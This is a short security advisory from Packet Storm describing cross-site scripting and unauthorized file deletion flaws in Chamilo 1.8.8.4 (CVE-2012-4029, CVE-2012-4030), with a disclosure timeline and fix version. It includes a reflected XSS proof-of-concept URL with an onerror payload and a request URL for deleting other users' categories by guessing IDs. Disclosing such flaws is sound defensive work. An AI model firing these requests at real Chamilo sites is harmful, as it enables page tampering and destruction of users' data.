Chamilo version 1.8.8.4 suffers from cross site scripting and file deletion vulnerabilities.
f6702243903936cbaa2e98f608ae5a643d456a1e780d4347484c278c5840d79eChamilo 1.8.8.4 Multiple Vulnerabilities
========================
CVE: CVE-2012-4029
Issue: Reflected XSS PHP_SELF in third-party app, Stored XSS
* PHP_SELF XSS
http://chamilo-1.8.8.4/main/inc/lib/phpdocx/pdf/www/examples.php/'"><img
src=404 onerror=alert(1) >
* Stored XSS unfiltered input category_name
http://chamilo/chamilo-1.8.8.4/main/dropbox/index.php?cidReq=LEETLANG&view=&action=addsentcategory
CVE: CVE-2012-4030
Issue: Unauthorized file delete
* Unauthorized file delete
You have to be subscribed to the course and you can delete other users
categories by bruteforcing the category ID.
http://chamilo/chamilo-1.8.8.4/main/dropbox/index.php?cidReq=COURSEID&view_received_category=&view_sent_category=&view=&action=deletesentcategory&id=CATEGORYID
Vendor:
www.chamilo.org
Vendor informed:
Jul 16/2012
Vendor acknowledgement:
Jul 16/2012
Fix Released
Version 1.8.8.6 - Jul 20/2012
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed